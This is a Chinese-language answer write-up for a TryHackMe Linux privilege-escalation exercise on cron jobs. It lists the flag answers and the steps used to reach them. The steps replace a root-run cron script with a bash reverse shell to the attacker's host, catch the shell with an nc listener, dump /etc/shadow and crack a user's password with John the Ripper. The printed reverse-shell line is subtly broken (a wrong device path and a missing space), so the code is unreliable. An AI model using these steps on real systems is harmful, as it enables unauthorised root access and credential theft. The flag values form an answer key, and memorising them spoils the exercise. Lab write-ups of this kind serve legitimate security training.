【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Cron Jobs
·
1. How many user-defined cron jobs can you see on the target system?-在目标系统上可以看到多少个用户定义的cron作业?
4
【解题】:直接cat /etc/crontab

2. What is the content of the flag5.txt file?-flag5.txt文件的内容是什么?
THM-383000283
【解题】:
(1) 根据课程内容,修改靶机上backup.sh内容为
#!/bin/bash
bash -i >& /tcp/dev/(攻击机的IP地址)/(nc启的监听端口)0>&1
(2) 在攻击机上通过ncq启动监听
nc -nlvp 6666
(3) 根据系统crontab配置每分钟应该会执行backup.sh文件,待执行后攻击机上会收到靶机的主动链接
(4)连接建立后,可见已获取靶机root权限

(5)拥有root权限后,直接读取flag5.txt内容即可

3. What is Matt's password?-Matt的密码是什么?
123456
【解题】:
(1)获取root权限后,直接cat /etc/shadow
![]()
(2)找到matt那一行内容,复制、创建pass.txt文件
(3) 新启动一个命令行窗口,通过John the Ripper破解matt密码,命令:john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

更多推荐




所有评论(0)